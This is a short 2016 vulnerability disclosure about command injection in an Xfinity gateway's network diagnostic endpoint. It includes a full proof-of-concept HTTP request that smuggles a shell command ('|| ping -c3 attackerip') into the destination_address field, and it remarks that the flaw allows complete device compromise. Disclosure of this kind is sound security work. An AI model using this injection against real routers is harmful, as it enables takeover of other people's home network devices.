Xfinity Gateway Remote Code Execution
Posted on 03 December 2016
# Exploit Title: Xfinity Gateway: Remote Code Execution # Date: 12/2/2016 # Exploit Author: Gregory Smiley # Contact: gsx0r.sec@gmail.com # Vendor Homepage: http://xfinity.com # Platform: php The page located at /network_diagnostic_tools.php has a feature called test connectivity, which is carried out through a post request to /actionHandler/ajax_network_diagnostic_tools.php. The parameter destination_address is vulnerable to command injection. PoC: POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1 Host: 10.0.0.1 User-Agent: Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://10.0.0.1/network_diagnostic_tools.php Content-Length: 91 Cookie: PHPSESSID=; auth= DNT: 1 X-Forwarded-For: 8.8.8.8 Connection: keep-alive test_connectivity=true&destination_address=www.comcast.net || ping -c3 attackerip; &count1=4 If you open up wireshark and set ip.dst==attackerip and icmp you will see that the router issues 3 icmp echo requests, proving successful command injection. This can be leveraged to completely compromise the device. This vulnerability is also particularly dangerous because there is no CSRF protections in this application as demonstrated here https://www.exploit-db.com/exploits/40853/
